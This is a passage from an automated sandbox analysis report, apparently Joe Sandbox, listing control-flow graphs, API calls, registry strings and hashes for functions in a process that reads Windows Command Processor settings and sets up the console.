                                                                                                                                                                        control_flow_graph 579 7ff6e9435554-7ff6e94355b9 call 7ff6e943a640 582 7ff6e94355bc-7ff6e94355e8 RegOpenKeyExW 579->582 583 7ff6e9435887-7ff6e943588e 582->583 584 7ff6e94355ee-7ff6e9435631 RegQueryValueExW 582->584 583->582 587 7ff6e9435894-7ff6e94358db time srand call 7ff6e9438f80 583->587 585 7ff6e943f248-7ff6e943f24d 584->585 586 7ff6e9435637-7ff6e9435675 RegQueryValueExW 584->586 589 7ff6e943f260-7ff6e943f265 585->589 590 7ff6e943f24f-7ff6e943f25b 585->590 591 7ff6e9435677-7ff6e943567c 586->591 592 7ff6e943568e-7ff6e94356cc RegQueryValueExW 586->592 589->586 594 7ff6e943f26b-7ff6e943f286 _wtol 589->594 590->586 595 7ff6e943f28b-7ff6e943f290 591->595 596 7ff6e9435682-7ff6e9435687 591->596 597 7ff6e943f2b6-7ff6e943f2bb 592->597 598 7ff6e94356d2-7ff6e9435710 RegQueryValueExW 592->598 594->586 595->592 599 7ff6e943f296-7ff6e943f2b1 _wtol 595->599 596->592 600 7ff6e943f2bd-7ff6e943f2c9 597->600 601 7ff6e943f2ce-7ff6e943f2d3 597->601 602 7ff6e9435729-7ff6e9435767 RegQueryValueExW 598->602 603 7ff6e9435712-7ff6e9435717 598->603 599->592 600->598 601->598 608 7ff6e943f2d9-7ff6e943f2f4 _wtol 601->608 606 7ff6e9435769-7ff6e943576e 602->606 607 7ff6e943579f-7ff6e94357dd RegQueryValueExW 602->607 604 7ff6e943f2f9-7ff6e943f2fe 603->604 605 7ff6e943571d-7ff6e9435722 603->605 604->602 613 7ff6e943f304-7ff6e943f31a wcstol 604->613 605->602 609 7ff6e943f320-7ff6e943f325 606->609 610 7ff6e9435774-7ff6e943578f 606->610 611 7ff6e943f3a9 607->611 612 7ff6e94357e3-7ff6e94357e8 607->612 608->598 614 7ff6e943f327-7ff6e943f33f wcstol 609->614 615 7ff6e943f34b 609->615 616 7ff6e943f357-7ff6e943f35e 610->616 617 7ff6e9435795-7ff6e9435799 610->617 624 7ff6e943f3b5-7ff6e943f3b8 611->624 618 7ff6e94357ee-7ff6e9435809 612->618 619 7ff6e943f363-7ff6e943f368 612->619 613->609 614->615 615->616 616->607 617->607 617->616 622 7ff6e943f39a-7ff6e943f39d 618->622 623 7ff6e943580f-7ff6e9435813 618->623 620 7ff6e943f36a-7ff6e943f382 wcstol 619->620 621 7ff6e943f38e 619->621 620->621 621->622 622->611 623->622 625 7ff6e9435819-7ff6e9435823 623->625 626 7ff6e943582c 624->626 627 7ff6e943f3be-7ff6e943f3c5 624->627 625->624 629 7ff6e9435829 625->629 628 7ff6e9435832-7ff6e9435870 RegQueryValueExW 626->628 630 7ff6e943f3ca-7ff6e943f3d1 626->630 627->628 631 7ff6e9435876-7ff6e9435882 RegCloseKey 628->631 632 7ff6e943f3dd-7ff6e943f3e2 628->632 629->626 630->632 631->583 633 7ff6e943f3e4-7ff6e943f412 ExpandEnvironmentStringsW 632->633 634 7ff6e943f433-7ff6e943f439 632->634 635 7ff6e943f428 633->635 636 7ff6e943f414-7ff6e943f426 call 7ff6e94313e0 633->636 634->631 637 7ff6e943f43f-7ff6e943f44c call 7ff6e942b900 634->637 639 7ff6e943f42e 635->639 636->639 637->631 639->634
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                        • API String ID: 145004033-3846321370
                                                                                                                                                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                        • Instruction ID: fd95c9b61ba7746aaef4a795ddadbf7c456097f6dbde7ea9bbbc61292e6250bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                        • Instruction Fuzzy Hash: 83E1503352DA82C6E750DF60E45467EB7A0FF89740F405135EA8E82A58DF7ED548CB0A
                                                                                                                                                                        Function 00007FF6E94337D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 821 7ff6e94337d8-7ff6e9433887 GetCurrentThreadId OpenThread call 7ff6e94304f4 HeapSetInformation RegOpenKeyExW 824 7ff6e943e9f8-7ff6e943ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff6e943388d-7ff6e94338eb call 7ff6e9435920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff6e943ea41-7ff6e943ea59 GetThreadLocale 824->827 825->827 831 7ff6e94338f1-7ff6e9433913 memset 825->831 829 7ff6e943ea5b-7ff6e943ea67 827->829 830 7ff6e943ea74-7ff6e943ea77 827->830 829->830 834 7ff6e943ea79-7ff6e943ea7d 830->834 835 7ff6e943ea94-7ff6e943ea96 830->835 832 7ff6e9433919-7ff6e9433935 call 7ff6e9434d5c 831->832 833 7ff6e943eaa5 831->833 842 7ff6e943393b-7ff6e9433942 832->842 843 7ff6e943eae2-7ff6e943eaff call 7ff6e9423240 call 7ff6e9448530 call 7ff6e9434c1c 832->843 836 7ff6e943eaa8-7ff6e943eab4 833->836 834->835 838 7ff6e943ea7f-7ff6e943ea89 834->838 835->833 836->832 839 7ff6e943eaba-7ff6e943eac3 836->839 838->835 841 7ff6e943eacb-7ff6e943eace 839->841 844 7ff6e943ead0-7ff6e943eadb 841->844 845 7ff6e943eac5-7ff6e943eac9 841->845 847 7ff6e9433948-7ff6e9433962 _setjmp 842->847 848 7ff6e943eb27-7ff6e943eb40 _setjmp 842->848 854 7ff6e943eb00-7ff6e943eb0d 843->854 844->836 851 7ff6e943eadd 844->851 845->841 853 7ff6e9433968-7ff6e943396d 847->853 847->854 849 7ff6e943eb46-7ff6e943eb49 848->849 850 7ff6e94339fe-7ff6e9433a05 call 7ff6e9434c1c 848->850 856 7ff6e943eb66-7ff6e943eb6f call 7ff6e94301b8 849->856 857 7ff6e943eb4b-7ff6e943eb65 call 7ff6e9423240 call 7ff6e9448530 call 7ff6e9434c1c 849->857 850->824 851->832 859 7ff6e94339b9-7ff6e94339bb 853->859 860 7ff6e943396f 853->860 868 7ff6e943eb15-7ff6e943eb1f call 7ff6e9434c1c 854->868 882 7ff6e943eb87-7ff6e943eb89 call 7ff6e94386f0 856->882 883 7ff6e943eb71-7ff6e943eb82 _setmode 856->883 857->856 863 7ff6e943eb20 859->863 864 7ff6e94339c1-7ff6e94339c3 call 7ff6e9434c1c 859->864 867 7ff6e9433972-7ff6e943397d 860->867 863->848 879 7ff6e94339c8 864->879 869 7ff6e94339c9-7ff6e94339de call 7ff6e942df60 867->869 870 7ff6e943397f-7ff6e9433984 867->870 868->863 869->868 891 7ff6e94339e4-7ff6e94339e8 869->891 870->867 876 7ff6e9433986-7ff6e94339ae call 7ff6e9430580 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 870->876 897 7ff6e94339b3 876->897 879->869 888 7ff6e943eb8e-7ff6e943ebad call 7ff6e94358e4 call 7ff6e942df60 882->888 883->882 902 7ff6e943ebaf-7ff6e943ebb3 888->902 891->850 895 7ff6e94339ea-7ff6e94339ef call 7ff6e942be00 891->895 899 7ff6e94339f4-7ff6e94339fc 895->899 897->859 899->870 902->850 903 7ff6e943ebb9-7ff6e943ec24 call 7ff6e94358e4 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 call 7ff6e942be00 call 7ff6e9430580 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 902->903 903->888
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                        • API String ID: 2624720099-1920437939
                                                                                                                                                                        • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                        • Instruction ID: 9b636658a6d472d51f9caab28fcc224e91bf5d85dc7f3a7623475554e0bcc34c
                                                                                                                                                                        • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                        • Instruction Fuzzy Hash: B5C19F73E08642CAF714EF70A4483B96AA0FF49754F544139DA1EC6B92DE3EA44DC70A
                                                                                                                                                                        Function 00007FF6E943823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1118 7ff6e943823c-7ff6e943829b FindFirstFileExW 1119 7ff6e94382cd-7ff6e94382df 1118->1119 1120 7ff6e943829d-7ff6e94382a9 GetLastError 1118->1120 1124 7ff6e9438365-7ff6e943837b FindNextFileW 1119->1124 1125 7ff6e94382e5-7ff6e94382ee 1119->1125 1121 7ff6e94382af 1120->1121 1122 7ff6e94382b1-7ff6e94382cb 1121->1122 1126 7ff6e943837d-7ff6e9438380 1124->1126 1127 7ff6e94383d0-7ff6e94383e5 FindClose 1124->1127 1128 7ff6e94382f1-7ff6e94382f4 1125->1128 1126->1119 1129 7ff6e9438386 1126->1129 1127->1128 1130 7ff6e9438329-7ff6e943832b 1128->1130 1131 7ff6e94382f6-7ff6e9438300 1128->1131 1129->1120 1130->1121 1132 7ff6e943832d 1130->1132 1133 7ff6e9438332-7ff6e9438353 GetProcessHeap HeapAlloc 1131->1133 1134 7ff6e9438302-7ff6e943830e 1131->1134 1132->1120 1135 7ff6e9438356-7ff6e9438363 1133->1135 1136 7ff6e943838b-7ff6e94383c2 GetProcessHeap HeapReAlloc 1134->1136 1137 7ff6e9438310-7ff6e9438313 1134->1137 1135->1137 1138 7ff6e94450f8-7ff6e944511e GetLastError FindClose 1136->1138 1139 7ff6e94383c8-7ff6e94383ce 1136->1139 1140 7ff6e9438327 1137->1140 1141 7ff6e9438315-7ff6e9438323 1137->1141 1138->1122 1139->1135 1140->1130 1141->1140
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 873889042-0
                                                                                                                                                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                        • Instruction ID: 3ad62b98b4c20e97cd88b956b0bcc23845d5a7d6c44566757cd611abacf289e8
                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                        • Instruction Fuzzy Hash: 855108B7A09B42C6E7108F62A4442BDBBA0FF99B91F449135CA1E83351DF3EE458C709
                                                                                                                                                                        Function 00007FF6E9432978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1142 7ff6e9432978-7ff6e94329b6 1143 7ff6e94329b9-7ff6e94329c1 1142->1143 1143->1143 1144 7ff6e94329c3-7ff6e94329c5 1143->1144 1145 7ff6e94329cb-7ff6e94329cf 1144->1145 1146 7ff6e943e441 1144->1146 1147 7ff6e94329d2-7ff6e94329da 1145->1147 1148 7ff6e94329dc-7ff6e94329e1 1147->1148 1149 7ff6e9432a1e-7ff6e9432a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff6e94329e3-7ff6e94329eb 1148->1152 1150 7ff6e943e435-7ff6e943e439 1149->1150 1151 7ff6e9432a44-7ff6e9432a5c FindClose 1149->1151 1150->1146 1153 7ff6e9432a62-7ff6e9432a6e 1151->1153 1154 7ff6e9432ae3-7ff6e9432ae5 1151->1154 1152->1147 1155 7ff6e94329ed-7ff6e9432a1c call 7ff6e9438f80 1152->1155 1156 7ff6e9432a70-7ff6e9432a78 1153->1156 1157 7ff6e943e3f7-7ff6e943e3ff 1154->1157 1158 7ff6e9432aeb-7ff6e9432b10 _wcsnicmp 1154->1158 1156->1156 1161 7ff6e9432a7a-7ff6e9432a8d 1156->1161 1158->1153 1162 7ff6e9432b16-7ff6e943e3f1 _wcsicmp 1158->1162 1161->1146 1163 7ff6e9432a93-7ff6e9432a97 1161->1163 1162->1153 1162->1157 1165 7ff6e9432a9d-7ff6e9432ade memmove call 7ff6e94313e0 1163->1165 1166 7ff6e943e404-7ff6e943e407 1163->1166 1165->1152 1167 7ff6e943e40b-7ff6e943e413 1166->1167 1167->1167 1169 7ff6e943e415-7ff6e943e42b memmove 1167->1169 1169->1150
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                        • Instruction ID: 7a724d016c5e05420fc9df98c0e36f57778de9691155a25a8de97433ebbc7cb8
                                                                                                                                                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                        • Instruction Fuzzy Hash: 5351E123B19682C6EA30DF35A5483BAA290BF54BA4F445230DE6E876D1DF3DE449C709
                                                                                                                                                                        Function 00007FF6E9434D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 643 7ff6e9434d5c-7ff6e9434e4b InitializeCriticalSection call 7ff6e94358e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff6e9430580 call 7ff6e9434a14 call 7ff6e9434ad0 call 7ff6e9435554 GetCommandLineW 654 7ff6e9434e4d-7ff6e9434e54 643->654 654->654 655 7ff6e9434e56-7ff6e9434e61 654->655 656 7ff6e9434e67-7ff6e9434e7b call 7ff6e9432e44 655->656 657 7ff6e94351cf-7ff6e94351e3 call 7ff6e9423278 call 7ff6e9434c1c 655->657 662 7ff6e94351ba-7ff6e94351ce call 7ff6e9423278 call 7ff6e9434c1c 656->662 663 7ff6e9434e81-7ff6e9434ec3 GetCommandLineW call 7ff6e94313e0 call 7ff6e942ca40 656->663 662->657 663->662 674 7ff6e9434ec9-7ff6e9434ee8 call 7ff6e943417c call 7ff6e9432394 663->674 678 7ff6e9434eed-7ff6e9434ef5 674->678 678->678 679 7ff6e9434ef7-7ff6e9434f1f call 7ff6e942aa54 678->679 682 7ff6e9434f21-7ff6e9434f30 679->682 683 7ff6e9434f95-7ff6e9434fee GetConsoleOutputCP GetCPInfo call 7ff6e94351ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff6e9434f32-7ff6e9434f39 682->684 689 7ff6e9434ff0-7ff6e9435006 GetConsoleTitleW 683->689 690 7ff6e9435012-7ff6e9435018 683->690 684->683 686 7ff6e9434f3b-7ff6e9434f77 call 7ff6e9423278 GetWindowsDirectoryW 684->686 696 7ff6e9434f7d-7ff6e9434f90 call 7ff6e9433c24 686->696 697 7ff6e94351b1-7ff6e94351b9 call 7ff6e9434c1c 686->697 689->690 694 7ff6e9435008-7ff6e943500f 689->694 691 7ff6e943507a-7ff6e943507e 690->691 692 7ff6e943501a-7ff6e9435024 call 7ff6e9433578 690->692 698 7ff6e94350eb-7ff6e9435161 GetModuleHandleW GetProcAddress * 3 691->698 699 7ff6e9435080-7ff6e94350b3 call 7ff6e944b89c call 7ff6e942586c call 7ff6e9423240 call 7ff6e9433448 691->699 692->691 706 7ff6e9435026-7ff6e9435030 692->706 694->690 696->683 697->662 704 7ff6e943516f 698->704 705 7ff6e9435163-7ff6e9435167 698->705 724 7ff6e94350b5-7ff6e94350d0 call 7ff6e9433448 * 2 699->724 725 7ff6e94350d2-7ff6e94350d7 call 7ff6e9423278 699->725 710 7ff6e9435172-7ff6e94351af free call 7ff6e9438f80 704->710 705->704 709 7ff6e9435169-7ff6e943516d 705->709 712 7ff6e9435075 call 7ff6e944cff0 706->712 713 7ff6e9435032-7ff6e9435059 GetStdHandle GetConsoleScreenBufferInfo 706->713 709->704 709->710 712->691 716 7ff6e9435069-7ff6e9435073 713->716 717 7ff6e943505b-7ff6e9435067 713->717 716->691 716->712 717->691 729 7ff6e94350dc-7ff6e94350e6 GlobalFree 724->729 725->729 729->698
                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434D9A
                                                                                                                                                                          • Part of subcall function 00007FF6E94358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6E944C6DB), ref: 00007FF6E94358EF
                                                                                                                                                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434DBB
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9434DCA
                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434DE0
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9434DEE
                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E04
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E9430589
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: SetConsoleMode.KERNELBASE ref: 00007FF6E943059E
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E94305AF
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: GetConsoleMode.KERNELBASE ref: 00007FF6E94305C5
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E94305EF
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: GetConsoleMode.KERNELBASE ref: 00007FF6E9430605
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E9430632
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: SetConsoleMode.KERNELBASE ref: 00007FF6E9430647
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
                                                                                                                                                                          • Part of subcall function 00007FF6E9434AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AD6
                                                                                                                                                                          • Part of subcall function 00007FF6E9434AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AEF
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6E9434E35), ref: 00007FF6E94355DA
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435623
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435667
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E94356BE
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435702
                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E35
                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E81
                                                                                                                                                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434F69
                                                                                                                                                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434F95
                                                                                                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FB0
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FC1
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FD8
                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FF8
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435037
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943504B
                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E94350DF
                                                                                                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E94350F2
                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943510F
                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435130
                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943514A
                                                                                                                                                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435175
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
